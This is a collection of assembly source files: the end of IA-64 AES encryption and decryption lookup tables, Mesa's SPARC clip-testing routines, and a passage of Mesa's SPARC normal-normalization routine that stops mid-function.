data1 0xc4, 0xa7, 0x7e, 0x3d, 0x64, 0x5d, 0x19, 0x73
data1 0x60, 0x81, 0x4f, 0xdc, 0x22, 0x2a, 0x90, 0x88
data1 0x46, 0xee, 0xb8, 0x14, 0xde, 0x5e, 0x0b, 0xdb
data1 0xe0, 0x32, 0x3a, 0x0a, 0x49, 0x06, 0x24, 0x5c
data1 0xc2, 0xd3, 0xac, 0x62, 0x91, 0x95, 0xe4, 0x79
data1 0xe7, 0xc8, 0x37, 0x6d, 0x8d, 0xd5, 0x4e, 0xa9
data1 0x6c, 0x56, 0xf4, 0xea, 0x65, 0x7a, 0xae, 0x08
data1 0xba, 0x78, 0x25, 0x2e, 0x1c, 0xa6, 0xb4, 0xc6
data1 0xe8, 0xdd, 0x74, 0x1f, 0x4b, 0xbd, 0x8b, 0x8a
data1 0x70, 0x3e, 0xb5, 0x66, 0x48, 0x03, 0xf6, 0x0e
data1 0x61, 0x35, 0x57, 0xb9, 0x86, 0xc1, 0x1d, 0x9e
data1 0xe1, 0xf8, 0x98, 0x11, 0x69, 0xd9, 0x8e, 0x94
data1 0x9b, 0x1e, 0x87, 0xe9, 0xce, 0x55, 0x28, 0xdf
data1 0x8c, 0xa1, 0x89, 0x0d, 0xbf, 0xe6, 0x42, 0x68
data1 0x41, 0x99, 0x2d, 0x0f, 0xb0, 0x54, 0xbb, 0x16
// 2048 bytes of Te + 256 bytes of Te4 (size spelled out literally
// because the HP-UX assembler cannot evaluate ".-AES_Te#").
.size AES_Te#,2048+256 // HP-UX assembler fails to ".-AES_Te#"
.align 64
.global AES_Td#
.type AES_Td#,@object
// AES inverse (decryption) lookup tables: Td (256 entries, each 32-bit
// word emitted twice, mirroring the AES_Te layout above) followed by
// the inverse S-box Td4 (256 bytes) used by the final decryption round.
// Values are the standard FIPS-197 inverse tables.
AES_Td: data4 0x51f4a750,0x51f4a750, 0x7e416553,0x7e416553
data4 0x1a17a4c3,0x1a17a4c3, 0x3a275e96,0x3a275e96
data4 0x3bab6bcb,0x3bab6bcb, 0x1f9d45f1,0x1f9d45f1
data4 0xacfa58ab,0xacfa58ab, 0x4be30393,0x4be30393
data4 0x2030fa55,0x2030fa55, 0xad766df6,0xad766df6
data4 0x88cc7691,0x88cc7691, 0xf5024c25,0xf5024c25
data4 0x4fe5d7fc,0x4fe5d7fc, 0xc52acbd7,0xc52acbd7
data4 0x26354480,0x26354480, 0xb562a38f,0xb562a38f
data4 0xdeb15a49,0xdeb15a49, 0x25ba1b67,0x25ba1b67
data4 0x45ea0e98,0x45ea0e98, 0x5dfec0e1,0x5dfec0e1
data4 0xc32f7502,0xc32f7502, 0x814cf012,0x814cf012
data4 0x8d4697a3,0x8d4697a3, 0x6bd3f9c6,0x6bd3f9c6
data4 0x038f5fe7,0x038f5fe7, 0x15929c95,0x15929c95
data4 0xbf6d7aeb,0xbf6d7aeb, 0x955259da,0x955259da
data4 0xd4be832d,0xd4be832d, 0x587421d3,0x587421d3
data4 0x49e06929,0x49e06929, 0x8ec9c844,0x8ec9c844
data4 0x75c2896a,0x75c2896a, 0xf48e7978,0xf48e7978
data4 0x99583e6b,0x99583e6b, 0x27b971dd,0x27b971dd
data4 0xbee14fb6,0xbee14fb6, 0xf088ad17,0xf088ad17
data4 0xc920ac66,0xc920ac66, 0x7dce3ab4,0x7dce3ab4
data4 0x63df4a18,0x63df4a18, 0xe51a3182,0xe51a3182
data4 0x97513360,0x97513360, 0x62537f45,0x62537f45
data4 0xb16477e0,0xb16477e0, 0xbb6bae84,0xbb6bae84
data4 0xfe81a01c,0xfe81a01c, 0xf9082b94,0xf9082b94
data4 0x70486858,0x70486858, 0x8f45fd19,0x8f45fd19
data4 0x94de6c87,0x94de6c87, 0x527bf8b7,0x527bf8b7
data4 0xab73d323,0xab73d323, 0x724b02e2,0x724b02e2
data4 0xe31f8f57,0xe31f8f57, 0x6655ab2a,0x6655ab2a
data4 0xb2eb2807,0xb2eb2807, 0x2fb5c203,0x2fb5c203
data4 0x86c57b9a,0x86c57b9a, 0xd33708a5,0xd33708a5
data4 0x302887f2,0x302887f2, 0x23bfa5b2,0x23bfa5b2
data4 0x02036aba,0x02036aba, 0xed16825c,0xed16825c
data4 0x8acf1c2b,0x8acf1c2b, 0xa779b492,0xa779b492
data4 0xf307f2f0,0xf307f2f0, 0x4e69e2a1,0x4e69e2a1
data4 0x65daf4cd,0x65daf4cd, 0x0605bed5,0x0605bed5
data4 0xd134621f,0xd134621f, 0xc4a6fe8a,0xc4a6fe8a
data4 0x342e539d,0x342e539d, 0xa2f355a0,0xa2f355a0
data4 0x058ae132,0x058ae132, 0xa4f6eb75,0xa4f6eb75
data4 0x0b83ec39,0x0b83ec39, 0x4060efaa,0x4060efaa
data4 0x5e719f06,0x5e719f06, 0xbd6e1051,0xbd6e1051
data4 0x3e218af9,0x3e218af9, 0x96dd063d,0x96dd063d
data4 0xdd3e05ae,0xdd3e05ae, 0x4de6bd46,0x4de6bd46
data4 0x91548db5,0x91548db5, 0x71c45d05,0x71c45d05
data4 0x0406d46f,0x0406d46f, 0x605015ff,0x605015ff
data4 0x1998fb24,0x1998fb24, 0xd6bde997,0xd6bde997
data4 0x894043cc,0x894043cc, 0x67d99e77,0x67d99e77
data4 0xb0e842bd,0xb0e842bd, 0x07898b88,0x07898b88
data4 0xe7195b38,0xe7195b38, 0x79c8eedb,0x79c8eedb
data4 0xa17c0a47,0xa17c0a47, 0x7c420fe9,0x7c420fe9
data4 0xf8841ec9,0xf8841ec9, 0x00000000,0x00000000
data4 0x09808683,0x09808683, 0x322bed48,0x322bed48
data4 0x1e1170ac,0x1e1170ac, 0x6c5a724e,0x6c5a724e
data4 0xfd0efffb,0xfd0efffb, 0x0f853856,0x0f853856
data4 0x3daed51e,0x3daed51e, 0x362d3927,0x362d3927
data4 0x0a0fd964,0x0a0fd964, 0x685ca621,0x685ca621
data4 0x9b5b54d1,0x9b5b54d1, 0x24362e3a,0x24362e3a
data4 0x0c0a67b1,0x0c0a67b1, 0x9357e70f,0x9357e70f
data4 0xb4ee96d2,0xb4ee96d2, 0x1b9b919e,0x1b9b919e
data4 0x80c0c54f,0x80c0c54f, 0x61dc20a2,0x61dc20a2
data4 0x5a774b69,0x5a774b69, 0x1c121a16,0x1c121a16
data4 0xe293ba0a,0xe293ba0a, 0xc0a02ae5,0xc0a02ae5
data4 0x3c22e043,0x3c22e043, 0x121b171d,0x121b171d
data4 0x0e090d0b,0x0e090d0b, 0xf28bc7ad,0xf28bc7ad
data4 0x2db6a8b9,0x2db6a8b9, 0x141ea9c8,0x141ea9c8
data4 0x57f11985,0x57f11985, 0xaf75074c,0xaf75074c
data4 0xee99ddbb,0xee99ddbb, 0xa37f60fd,0xa37f60fd
data4 0xf701269f,0xf701269f, 0x5c72f5bc,0x5c72f5bc
data4 0x44663bc5,0x44663bc5, 0x5bfb7e34,0x5bfb7e34
data4 0x8b432976,0x8b432976, 0xcb23c6dc,0xcb23c6dc
data4 0xb6edfc68,0xb6edfc68, 0xb8e4f163,0xb8e4f163
data4 0xd731dcca,0xd731dcca, 0x42638510,0x42638510
data4 0x13972240,0x13972240, 0x84c61120,0x84c61120
data4 0x854a247d,0x854a247d, 0xd2bb3df8,0xd2bb3df8
data4 0xaef93211,0xaef93211, 0xc729a16d,0xc729a16d
data4 0x1d9e2f4b,0x1d9e2f4b, 0xdcb230f3,0xdcb230f3
data4 0x0d8652ec,0x0d8652ec, 0x77c1e3d0,0x77c1e3d0
data4 0x2bb3166c,0x2bb3166c, 0xa970b999,0xa970b999
data4 0x119448fa,0x119448fa, 0x47e96422,0x47e96422
data4 0xa8fc8cc4,0xa8fc8cc4, 0xa0f03f1a,0xa0f03f1a
data4 0x567d2cd8,0x567d2cd8, 0x223390ef,0x223390ef
data4 0x87494ec7,0x87494ec7, 0xd938d1c1,0xd938d1c1
data4 0x8ccaa2fe,0x8ccaa2fe, 0x98d40b36,0x98d40b36
data4 0xa6f581cf,0xa6f581cf, 0xa57ade28,0xa57ade28
data4 0xdab78e26,0xdab78e26, 0x3fadbfa4,0x3fadbfa4
data4 0x2c3a9de4,0x2c3a9de4, 0x5078920d,0x5078920d
data4 0x6a5fcc9b,0x6a5fcc9b, 0x547e4662,0x547e4662
data4 0xf68d13c2,0xf68d13c2, 0x90d8b8e8,0x90d8b8e8
data4 0x2e39f75e,0x2e39f75e, 0x82c3aff5,0x82c3aff5
data4 0x9f5d80be,0x9f5d80be, 0x69d0937c,0x69d0937c
data4 0x6fd52da9,0x6fd52da9, 0xcf2512b3,0xcf2512b3
data4 0xc8ac993b,0xc8ac993b, 0x10187da7,0x10187da7
data4 0xe89c636e,0xe89c636e, 0xdb3bbb7b,0xdb3bbb7b
data4 0xcd267809,0xcd267809, 0x6e5918f4,0x6e5918f4
data4 0xec9ab701,0xec9ab701, 0x834f9aa8,0x834f9aa8
data4 0xe6956e65,0xe6956e65, 0xaaffe67e,0xaaffe67e
data4 0x21bccf08,0x21bccf08, 0xef15e8e6,0xef15e8e6
data4 0xbae79bd9,0xbae79bd9, 0x4a6f36ce,0x4a6f36ce
data4 0xea9f09d4,0xea9f09d4, 0x29b07cd6,0x29b07cd6
data4 0x31a4b2af,0x31a4b2af, 0x2a3f2331,0x2a3f2331
data4 0xc6a59430,0xc6a59430, 0x35a266c0,0x35a266c0
data4 0x744ebc37,0x744ebc37, 0xfc82caa6,0xfc82caa6
data4 0xe090d0b0,0xe090d0b0, 0x33a7d815,0x33a7d815
data4 0xf104984a,0xf104984a, 0x41ecdaf7,0x41ecdaf7
data4 0x7fcd500e,0x7fcd500e, 0x1791f62f,0x1791f62f
data4 0x764dd68d,0x764dd68d, 0x43efb04d,0x43efb04d
data4 0xccaa4d54,0xccaa4d54, 0xe49604df,0xe49604df
data4 0x9ed1b5e3,0x9ed1b5e3, 0x4c6a881b,0x4c6a881b
data4 0xc12c1fb8,0xc12c1fb8, 0x4665517f,0x4665517f
data4 0x9d5eea04,0x9d5eea04, 0x018c355d,0x018c355d
data4 0xfa877473,0xfa877473, 0xfb0b412e,0xfb0b412e
data4 0xb3671d5a,0xb3671d5a, 0x92dbd252,0x92dbd252
data4 0xe9105633,0xe9105633, 0x6dd64713,0x6dd64713
data4 0x9ad7618c,0x9ad7618c, 0x37a10c7a,0x37a10c7a
data4 0x59f8148e,0x59f8148e, 0xeb133c89,0xeb133c89
data4 0xcea927ee,0xcea927ee, 0xb761c935,0xb761c935
data4 0xe11ce5ed,0xe11ce5ed, 0x7a47b13c,0x7a47b13c
data4 0x9cd2df59,0x9cd2df59, 0x55f2733f,0x55f2733f
data4 0x1814ce79,0x1814ce79, 0x73c737bf,0x73c737bf
data4 0x53f7cdea,0x53f7cdea, 0x5ffdaa5b,0x5ffdaa5b
data4 0xdf3d6f14,0xdf3d6f14, 0x7844db86,0x7844db86
data4 0xcaaff381,0xcaaff381, 0xb968c43e,0xb968c43e
data4 0x3824342c,0x3824342c, 0xc2a3405f,0xc2a3405f
data4 0x161dc372,0x161dc372, 0xbce2250c,0xbce2250c
data4 0x283c498b,0x283c498b, 0xff0d9541,0xff0d9541
data4 0x39a80171,0x39a80171, 0x080cb3de,0x080cb3de
data4 0xd8b4e49c,0xd8b4e49c, 0x6456c190,0x6456c190
data4 0x7bcb8461,0x7bcb8461, 0xd532b670,0xd532b670
data4 0x486c5c74,0x486c5c74, 0xd0b85742,0xd0b85742
// Td4: the inverse AES S-box (InvSubBytes), 256 bytes.
data1 0x52, 0x09, 0x6a, 0xd5, 0x30, 0x36, 0xa5, 0x38
data1 0xbf, 0x40, 0xa3, 0x9e, 0x81, 0xf3, 0xd7, 0xfb
data1 0x7c, 0xe3, 0x39, 0x82, 0x9b, 0x2f, 0xff, 0x87
data1 0x34, 0x8e, 0x43, 0x44, 0xc4, 0xde, 0xe9, 0xcb
data1 0x54, 0x7b, 0x94, 0x32, 0xa6, 0xc2, 0x23, 0x3d
data1 0xee, 0x4c, 0x95, 0x0b, 0x42, 0xfa, 0xc3, 0x4e
data1 0x08, 0x2e, 0xa1, 0x66, 0x28, 0xd9, 0x24, 0xb2
data1 0x76, 0x5b, 0xa2, 0x49, 0x6d, 0x8b, 0xd1, 0x25
data1 0x72, 0xf8, 0xf6, 0x64, 0x86, 0x68, 0x98, 0x16
data1 0xd4, 0xa4, 0x5c, 0xcc, 0x5d, 0x65, 0xb6, 0x92
data1 0x6c, 0x70, 0x48, 0x50, 0xfd, 0xed, 0xb9, 0xda
data1 0x5e, 0x15, 0x46, 0x57, 0xa7, 0x8d, 0x9d, 0x84
data1 0x90, 0xd8, 0xab, 0x00, 0x8c, 0xbc, 0xd3, 0x0a
data1 0xf7, 0xe4, 0x58, 0x05, 0xb8, 0xb3, 0x45, 0x06
data1 0xd0, 0x2c, 0x1e, 0x8f, 0xca, 0x3f, 0x0f, 0x02
data1 0xc1, 0xaf, 0xbd, 0x03, 0x01, 0x13, 0x8a, 0x6b
data1 0x3a, 0x91, 0x11, 0x41, 0x4f, 0x67, 0xdc, 0xea
data1 0x97, 0xf2, 0xcf, 0xce, 0xf0, 0xb4, 0xe6, 0x73
data1 0x96, 0xac, 0x74, 0x22, 0xe7, 0xad, 0x35, 0x85
data1 0xe2, 0xf9, 0x37, 0xe8, 0x1c, 0x75, 0xdf, 0x6e
data1 0x47, 0xf1, 0x1a, 0x71, 0x1d, 0x29, 0xc5, 0x89
data1 0x6f, 0xb7, 0x62, 0x0e, 0xaa, 0x18, 0xbe, 0x1b
data1 0xfc, 0x56, 0x3e, 0x4b, 0xc6, 0xd2, 0x79, 0x20
data1 0x9a, 0xdb, 0xc0, 0xfe, 0x78, 0xcd, 0x5a, 0xf4
data1 0x1f, 0xdd, 0xa8, 0x33, 0x88, 0x07, 0xc7, 0x31
data1 0xb1, 0x12, 0x10, 0x59, 0x27, 0x80, 0xec, 0x5f
data1 0x60, 0x51, 0x7f, 0xa9, 0x19, 0xb5, 0x4a, 0x0d
data1 0x2d, 0xe5, 0x7a, 0x9f, 0x93, 0xc9, 0x9c, 0xef
data1 0xa0, 0xe0, 0x3b, 0x4d, 0xae, 0x2a, 0xf5, 0xb0
data1 0xc8, 0xeb, 0xbb, 0x3c, 0x83, 0x53, 0x99, 0x61
data1 0x17, 0x2b, 0x04, 0x7e, 0xba, 0x77, 0xd6, 0x26
data1 0xe1, 0x69, 0x14, 0x63, 0x55, 0x21, 0x0c, 0x7d
// 2048 bytes of Td + 256 bytes of Td4 (size spelled out literally
// because the HP-UX assembler cannot evaluate ".-AES_Td#").
.size AES_Td#,2048+256 // HP-UX assembler fails to ".-AES_Td#"
|
AIFM-sys/AIFM
| 6,187
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/clip.S
|
/*
* Clip testing in SPARC assembly
*/
#if __arch64__
#define LDPTR ldx
#define V4F_DATA 0x00
#define V4F_START 0x08
#define V4F_COUNT 0x10
#define V4F_STRIDE 0x14
#define V4F_SIZE 0x18
#define V4F_FLAGS 0x1c
#else
#define LDPTR ld
#define V4F_DATA 0x00
#define V4F_START 0x04
#define V4F_COUNT 0x08
#define V4F_STRIDE 0x0c
#define V4F_SIZE 0x10
#define V4F_FLAGS 0x14
#endif
#define VEC_SIZE_1 1
#define VEC_SIZE_2 3
#define VEC_SIZE_3 7
#define VEC_SIZE_4 15
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
.register %g7, #scratch
#endif
.text
.align 64
/* FP constant 1.0f, loaded PC-relative via __pc_tramp below; the clip
 * table immediately follows it, so clip_table = &one_dot_zero + 4. */
one_dot_zero:
	.word	0x3f800000 /* 1.0f */
/* This trick is shamelessly stolen from the x86
 * Mesa asm. Very clever, and we can do it too
 * since we have the necessary add with carry
 * instructions on Sparc.
 */
/* 128-entry byte table mapping the 7-bit index built from the
 * sign/magnitude comparisons of (x, y, z, w) to the OpenGL clip-plane
 * outcode for that vertex (bit per frustum plane).  Indexed in the
 * cliptest loops as clip_table[%g3]. */
clip_table:
	.byte 0, 1, 0, 2, 4, 5, 4, 6
	.byte 0, 1, 0, 2, 8, 9, 8, 10
	.byte 32, 33, 32, 34, 36, 37, 36, 38
	.byte 32, 33, 32, 34, 40, 41, 40, 42
	.byte 0, 1, 0, 2, 4, 5, 4, 6
	.byte 0, 1, 0, 2, 8, 9, 8, 10
	.byte 16, 17, 16, 18, 20, 21, 20, 22
	.byte 16, 17, 16, 18, 24, 25, 24, 26
	.byte 63, 61, 63, 62, 55, 53, 55, 54
	.byte 63, 61, 63, 62, 59, 57, 59, 58
	.byte 47, 45, 47, 46, 39, 37, 39, 38
	.byte 47, 45, 47, 46, 43, 41, 43, 42
	.byte 63, 61, 63, 62, 55, 53, 55, 54
	.byte 63, 61, 63, 62, 59, 57, 59, 58
	.byte 31, 29, 31, 30, 23, 21, 23, 22
	.byte 31, 29, 31, 30, 27, 25, 27, 26
/* GLvector4f *clip_vec, GLvector4f *proj_vec,
GLubyte clipMask[], GLubyte *orMask, GLubyte *andMask */
.align 64
/* PC-discovery trampoline: simply returns, leaving the caller's PC in
 * %o7 so position-independent callers can compute data addresses as
 * offsets from the call site (see the `sub %o7, ...` in its callers). */
__pc_tramp:
	retl
	 nop
/* Clip-test + projective divide for 4-component float points.
 * C signature (see comment above):
 *   _mesa_sparc_cliptest_points4(GLvector4f *clip_vec,   %i0
 *                                GLvector4f *proj_vec,   %i1
 *                                GLubyte clipMask[],     %i2
 *                                GLubyte *orMask,        %i3
 *                                GLubyte *andMask)       %i4
 * Returns proj_vec (restored into %o0).  For each input point it builds
 * a clip outcode using the add-with-carry trick, stores it in
 * clipMask[i], accumulates the running OR/AND masks, and writes either
 * a zeroed point with w=1.0 (clipped) or (x,y,z,1)/w (visible) to
 * proj_vec.  Clobbers %g1-%g5, %g7, %f0-%f8 inside its own window. */
.globl _mesa_sparc_cliptest_points4
_mesa_sparc_cliptest_points4:
	save %sp, -64, %sp

	call __pc_tramp			! %o7 = PC of this call; data address =
	sub %o7, (. - one_dot_zero - 4), %g1	! call-site - code distance (PIC)
	ld [%g1 + 0x0], %f4		! %f4 = 1.0f
	add %g1, 0x4, %g1		! %g1 = clip_table

	ld [%i0 + V4F_STRIDE], %l1
	ld [%i0 + V4F_COUNT], %g7
	LDPTR [%i0 + V4F_START], %i0
	LDPTR [%i1 + V4F_START], %i5
	ldub [%i3], %g2			! pack (*andMask << 8) | *orMask into %g2
	ldub [%i4], %g3
	sll %g3, 8, %g3
	or %g2, %g3, %g2

	! mark proj_vec as full 4-component output with identical count
	ld [%i1 + V4F_FLAGS], %g3
	or %g3, VEC_SIZE_4, %g3
	st %g3, [%i1 + V4F_FLAGS]
	mov 3, %g3
	st %g3, [%i1 + V4F_SIZE]
	st %g7, [%i1 + V4F_COUNT]
	clr %l2
	clr %l0

	/* l0: i
	 * g7: count
	 * l1: stride
	 * l2: c
	 * g2: (tmpAndMask << 8) | tmpOrMask
	 * g1: clip_table
	 * i0: from[stride][i]
	 * i2: clipMask
	 * i5: vProj[4][i]
	 */
	! Per-point loop: the addcc/addx/subcc sequences shift each
	! coordinate's sign (and |coord| vs |w| carry) into %g3, producing
	! the clip_table index while the fdivs (1/w) runs in parallel.
1:	ld [%i0 + 0x0c], %f3		! LSU Group
	ld [%i0 + 0x0c], %g5		! LSU Group
	ld [%i0 + 0x08], %g4		! LSU Group
	fdivs %f4, %f3, %f8		! FGM
	addcc %g5, %g5, %g5		! IEU1 Group
	addx %g0, 0x0, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	ld [%i0 + 0x04], %g4		! LSU Group
	addx %g3, %g3, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	ld [%i0 + 0x00], %g4		! LSU Group
	addx %g3, %g3, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	ldub [%g1 + %g3], %g3		! LSU Group
	cmp %g3, 0			! IEU1 Group, stall
	be 2f				! CTI
	 stb %g3, [%i2]			! LSU (delay slot: always store mask)

	! Clipped point: count it, fold mask into OR/AND accumulator,
	! and emit (0, 0, 0, 1.0) so downstream code sees a valid w.
	sll %g3, 8, %g4			! IEU1 Group
	add %l2, 1, %l2			! IEU0
	st %g0, [%i5 + 0x00]		! LSU
	or %g4, 0xff, %g4		! IEU0 Group
	or %g2, %g3, %g2		! IEU1
	st %g0, [%i5 + 0x04]		! LSU
	and %g2, %g4, %g2		! IEU0 Group
	st %g0, [%i5 + 0x08]		! LSU
	b 3f				! CTI
	 st %f4, [%i5 + 0x0c]		! LSU Group (delay slot: w = 1.0)

	! Visible point: store (x, y, z, 1) * (1/w).
2:	ld [%i0 + 0x00], %f0		! LSU Group
	ld [%i0 + 0x04], %f1		! LSU Group
	ld [%i0 + 0x08], %f2		! LSU Group
	fmuls %f0, %f8, %f0		! FGM
	st %f0, [%i5 + 0x00]		! LSU Group
	fmuls %f1, %f8, %f1		! FGM
	st %f1, [%i5 + 0x04]		! LSU Group
	fmuls %f2, %f8, %f2		! FGM
	st %f2, [%i5 + 0x08]		! LSU Group
	st %f8, [%i5 + 0x0c]		! LSU Group

3:	add %i5, 0x10, %i5		! IEU1
	add %l0, 1, %l0			! IEU0 Group
	add %i2, 1, %i2			! IEU0 Group
	cmp %l0, %g7			! IEU1 Group
	bne 1b				! CTI
	 add %i0, %l1, %i0		! IEU0 Group (delay slot: next point)

	! Write back *orMask; *andMask is forced to 0 unless every point
	! was clipped (c == count) -- the annulled bl,a clears %g3.
	stb %g2, [%i3]			! LSU
	srl %g2, 8, %g3			! IEU0 Group
	cmp %l2, %g7			! IEU1 Group
	bl,a 1f				! CTI
	 clr %g3			! IEU0 (annulled unless taken)
1:	stb %g3, [%i4]			! LSU Group

	ret				! CTI Group
	 restore %i1, 0x0, %o0		! return proj_vec
/* Clip-test only ("np" = no projection) variant of the routine above.
 * Same arguments (%i0=clip_vec %i1=proj_vec %i2=clipMask %i3=orMask
 * %i4=andMask) and same outcode computation, but it never divides by w
 * or writes point data -- only clipMask[], *orMask, *andMask and the
 * proj_vec header fields are updated.  Returns proj_vec in %o0. */
.globl _mesa_sparc_cliptest_points4_np
_mesa_sparc_cliptest_points4_np:
	save %sp, -64, %sp

	call __pc_tramp			! PIC address discovery, as above
	sub %o7, (. - one_dot_zero - 4), %g1
	add %g1, 0x4, %g1		! %g1 = clip_table (1.0f constant unused here)

	ld [%i0 + V4F_STRIDE], %l1
	ld [%i0 + V4F_COUNT], %g7
	LDPTR [%i0 + V4F_START], %i0
	LDPTR [%i1 + V4F_START], %i5
	ldub [%i3], %g2			! pack (*andMask << 8) | *orMask into %g2
	ldub [%i4], %g3
	sll %g3, 8, %g3
	or %g2, %g3, %g2

	ld [%i1 + V4F_FLAGS], %g3
	or %g3, VEC_SIZE_4, %g3
	st %g3, [%i1 + V4F_FLAGS]
	mov 3, %g3
	st %g3, [%i1 + V4F_SIZE]
	st %g7, [%i1 + V4F_COUNT]
	clr %l2
	clr %l0

	/* l0: i
	 * g7: count
	 * l1: stride
	 * l2: c
	 * g2: (tmpAndMask << 8) | tmpOrMask
	 * g1: clip_table
	 * i0: from[stride][i]
	 * i2: clipMask
	 */
	! Same add-with-carry outcode construction as the projecting
	! version, minus the fdivs and the point stores.
1:	ld [%i0 + 0x0c], %g5		! LSU Group
	ld [%i0 + 0x08], %g4		! LSU Group
	addcc %g5, %g5, %g5		! IEU1 Group
	addx %g0, 0x0, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	ld [%i0 + 0x04], %g4		! LSU Group
	addx %g3, %g3, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	ld [%i0 + 0x00], %g4		! LSU Group
	addx %g3, %g3, %g3		! IEU1 Group
	addcc %g4, %g4, %g4		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	subcc %g5, %g4, %g0		! IEU1 Group
	addx %g3, %g3, %g3		! IEU1 Group
	ldub [%g1 + %g3], %g3		! LSU Group
	cmp %g3, 0			! IEU1 Group, stall
	be 2f				! CTI
	 stb %g3, [%i2]			! LSU (delay slot: always store mask)

	! Clipped point: count it and fold outcode into OR/AND accumulator.
	sll %g3, 8, %g4			! IEU1 Group
	add %l2, 1, %l2			! IEU0
	or %g4, 0xff, %g4		! IEU0 Group
	or %g2, %g3, %g2		! IEU1
	and %g2, %g4, %g2		! IEU0 Group

2:	add %l0, 1, %l0			! IEU0 Group
	add %i2, 1, %i2			! IEU0 Group
	cmp %l0, %g7			! IEU1 Group
	bne 1b				! CTI
	 add %i0, %l1, %i0		! IEU0 Group (delay slot: next point)

	! *andMask is zeroed unless every point was clipped (c == count).
	stb %g2, [%i3]			! LSU
	srl %g2, 8, %g3			! IEU0 Group
	cmp %l2, %g7			! IEU1 Group
	bl,a 1f				! CTI
	 clr %g3			! IEU0 (annulled unless taken)
1:	stb %g3, [%i4]			! LSU Group

	ret				! CTI Group
	 restore %i1, 0x0, %o0		! return proj_vec
|
AIFM-sys/AIFM
| 16,749
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/sparc/norm.S
|
/* $Id: norm.S,v 1.1.1.1 2012/03/29 17:22:11 uid42307 Exp $ */
#include "sparc_matrix.h"
#if defined(SVR4) || defined(__SVR4) || defined(__svr4__)
/* Solaris requires this for 64-bit. */
.register %g2, #scratch
.register %g3, #scratch
#endif
.text
#ifdef __arch64__
#define STACK_VAR_OFF (2047 + (8 * 16))
#else
#define STACK_VAR_OFF (4 * 16)
#endif
/* Newton-Raphson approximation turns out to be slower
* (and less accurate) than direct fsqrts/fdivs.
*/
#define ONE_DOT_ZERO 0x3f800000
/* Transform normals by the 3x3 block of mat->inv (rows M0..M2, M4..M6,
 * M8..M10 -- presumably the inverse-transpose used for normal
 * transformation; confirm against Mesa's m_norm_tmp.h) and normalize.
 * Args (o0=mat o1=scale o2=in o3=lengths o4=dest):
 *   lengths == NULL : normalize each transformed normal to unit length
 *                     via fsqrts + fdivs.
 *   lengths != NULL : pre-scale the matrix by `scale`, then multiply
 *                     each transformed normal by lengths[i] (the
 *                     caller-supplied reciprocal lengths).
 * Leaf-style routine: no register window; clobbers %o4, %o5, %g1-%g3
 * and %f0-%f15. */
.globl _mesa_sparc_transform_normalize_normals
_mesa_sparc_transform_normalize_normals:
	/* o0=mat o1=scale o2=in o3=lengths o4=dest */

	! Bounce 1.0f bit pattern and the float arg `scale` through the
	! stack to move them from integer regs into %f12 / %f15.
	sethi %hi(ONE_DOT_ZERO), %g2
	sub %sp, 16, %sp
	st %g2, [%sp + STACK_VAR_OFF+0x0]
	st %o1, [%sp + STACK_VAR_OFF+0x4]
	ld [%sp + STACK_VAR_OFF+0x0], %f12 ! f12 = 1.0f
	ld [%sp + STACK_VAR_OFF+0x4], %f15 ! f15 = scale
	add %sp, 16, %sp

	LDPTR [%o0 + MAT_INV], %o0 ! o0 = mat->inv
	LDPTR [%o2 + V4F_START], %o5 ! o5 = 'from' in->start
	ld [%o2 + V4F_COUNT], %g1 ! g1 = in->count
	ld [%o2 + V4F_STRIDE], %g2 ! g2 = in->stride
	LDPTR [%o4 + V4F_START], %g3 ! g3 = 'out' dest->start

	LDMATRIX_0_1_2_4_5_6_8_9_10(%o0)

	/* dest->count = in->count */
	st %g1, [%o4 + V4F_COUNT]

	cmp %g1, 1
	bl 7f				! nothing to do for count < 1
	 cmp %o3, 0			! delay slot: test lengths pointer
	bne 4f				! lengths != NULL -> pre-scaled path
	 clr %o4			! 'i' for STRIDE_LOOP

1:	/* LENGTHS == NULL */
	ld [%o5 + 0x00], %f0 ! ux = from[0]
	ld [%o5 + 0x04], %f1 ! uy = from[1]
	ld [%o5 + 0x08], %f2 ! uz = from[2]
	add %o5, %g2, %o5 ! STRIDE_F(from, stride)
	add %o4, 1, %o4 ! i++

	/* tx (f3) = (ux * m0) + (uy * m1) + (uz * m2)
	 * ty (f5) = (ux * m4) + (uy * m5) + (uz * m6)
	 * tz (f7) = (ux * m8) + (uy * m9) + (uz * m10)
	 */
	fmuls %f0, M0, %f3 ! FGM Group
	fmuls %f1, M1, %f4 ! FGM Group
	fmuls %f0, M4, %f5 ! FGM Group
	fmuls %f1, M5, %f6 ! FGM Group
	fmuls %f0, M8, %f7 ! FGM Group f3 available
	fmuls %f1, M9, %f8 ! FGM Group f4 available
	fadds %f3, %f4, %f3 ! FGA
	fmuls %f2, M2, %f10 ! FGM Group f5 available
	fmuls %f2, M6, %f0 ! FGM Group f6 available
	fadds %f5, %f6, %f5 ! FGA
	fmuls %f2, M10, %f4 ! FGM Group f7 available
	fadds %f7, %f8, %f7 ! FGA Group f8,f3 available
	fadds %f3, %f10, %f3 ! FGA Group f10 available
	fadds %f5, %f0, %f5 ! FGA Group stall f0,f5 available
	fadds %f7, %f4, %f7 ! FGA Group stall f4,f7 available

	/* f3=tx, f5=ty, f7=tz */

	/* len (f6) = (tx * tx) + (ty * ty) + (tz * tz) */
	fmuls %f3, %f3, %f6 ! FGM Group f3 available
	fmuls %f5, %f5, %f8 ! FGM Group f5 available
	fmuls %f7, %f7, %f10 ! FGM Group f7 available
